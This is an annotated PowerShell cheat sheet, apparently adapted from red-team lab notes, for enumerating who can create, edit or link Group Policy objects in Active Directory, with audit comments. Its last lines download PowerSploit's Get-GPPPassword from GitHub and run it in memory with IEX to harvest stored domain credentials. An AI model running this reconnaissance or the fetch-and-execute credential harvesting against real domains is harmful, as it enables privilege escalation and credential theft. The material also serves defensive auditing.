Enumeration

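# Enumerate Who Can Create Policy
# Lists the ACEs on the domain's Policies container that grant CreateChild, i.e. the
# principals able to create new GPOs. Requires PowerView to be loaded.
# The DNs below are lab values (MARVEL.local / dev.cyberbotic.io); substitute your own domain.
# Review: typically only Domain Admins, Enterprise Admins, Group Policy Creator Owners and
# SYSTEM are expected here. Any other SID is a delegation to justify or remove
# (resolve SIDs with PowerView's ConvertFrom-SID).
# No -SearchBase is given, so every object ACL in the domain is read before filtering;
# this is slow on large domains.
# Fixed: the pipeline variable is $_ (the original had "$." which PowerShell cannot parse).
Get-DomainObjectAcl -ResolveGUIDs | where {$_.ObjectDN -eq "CN=Policies,CN=System,DC=MARVEL,DC=local" -and $_.ActiveDirectoryRights -match "CreateChild"} | select ActiveDirectoryRights,ObjectAceType,SecurityIdentifier
# OR
# Scoped variant: -SearchBase limits the query to the Policies container, and the filter keeps
# only ACEs whose object type is Group-Policy-Container. An unscoped CreateChild ACE
# (object type "All") is therefore NOT shown by this form, so use both when auditing.
# NOTE(review): the leading "powershell" looks like a wrapper-console prefix kept from the
# original notes; omit it when already inside a PowerShell session.
powershell Get-DomainObjectAcl -SearchBase "CN=Policies,CN=System,DC=dev,DC=cyberbotic,DC=io" -ResolveGUIDs | ? { $_.ObjectAceType -eq "Group-Policy-Container" } | select ObjectDN, ActiveDirectoryRights, SecurityIdentifier | fl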

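# Enumerate Who Can Modify/Edit Policy
# Lists ACEs on GPO objects (CN={GUID},CN=Policies,...) whose rights contain "Write"
# (WriteProperty, WriteDacl, WriteOwner, GenericWrite). A principal holding one of these can
# change what the GPO applies to every computer/user in scope, so treat each non-admin SID
# as equivalent to admin over the linked OUs.
# NOTE(review): "Write" does not match GenericAll; check for it separately.
Get-DomainObjectAcl -ResolveGUIDs | where {$_.ObjectDN -match "^CN={[A-Z0-9-]*},CN=Policies" -and $_.ActiveDirectoryRights -match "Write"} | select ActiveDirectoryRights,ObjectAceType,SecurityIdentifier,ObjectDN
# OR
# Same question asked per GPO via Get-DomainGPO. The SID regex keeps only principals in the
# given domain whose RID has 4 or more digits, which hides the built-in low-RID admin groups
# and leaves the non-default delegations. The domain SID is a lab value; replace it with
# your own (PowerView: Get-DomainSID).
# (The original page listed this command under "Link Policy"; it reads GPO ACLs, so it belongs here.)
powershell Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "WriteProperty|WriteDacl|WriteOwner" -and $_.SecurityIdentifier -match "S-1-5-21-3263068140-2042698922-2891547269-[\d]{4,10}" } | select ObjectDN, ActiveDirectoryRights, SecurityIdentifier | fl

# Enumerate Who Can Link Policy
# Lists ACEs on OUs that apply to the GP-Link (gPLink) attribute. Whoever can write gPLink
# can attach an existing GPO to that OU.
# Only OUs are covered by both forms below; gPLink also exists on the domain root and on
# site objects, which need their own check.
# Monitoring: with "Audit Directory Service Changes" enabled and a SACL in place, event 5136
# records actual changes to gPLink and to GPO objects.
Get-DomainObjectAcl -ResolveGUIDs | where {$_.ObjectDN -match "^OU=" -and $_.ObjectAceType -match "GP-Link"} | select ActiveDirectoryRights,ObjectAceType,SecurityIdentifier,ObjectDN
# OR
# Per-OU variant that additionally requires WriteProperty on GP-Link.
# (The original page listed this command under "Modify/Edit Policy"; it reads OU ACLs, so it belongs here.)
powershell Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ObjectAceType -eq "GP-Link" -and $_.ActiveDirectoryRights -match "WriteProperty" } | select ObjectDN, SecurityIdentifier | fl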

# Domain Group Policy Preferences Leaked Credentials (https://adsecurity.org/?p=2288)
# Get-GPPPassword comes from PowerSploit; the linked article covers credentials that
# Group Policy Preferences stored in XML files on SYSVOL, which every domain user can read.
# NOTE(review): the next line fetches the script from the moving "master" branch and runs
# it in memory with IEX, so the code is neither pinned nor reviewed before execution.
# Use a reviewed, locally stored copy at a fixed commit instead. AMSI and PowerShell
# script block logging (event 4104) will normally record this download-and-execute pattern.
# Remediation for any hit: delete the GPP XML files that still contain a cpassword value
# and rotate the affected account passwords. Patching alone does not remove existing files.
IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-GPPPassword.ps1")
Get-GPPPassword
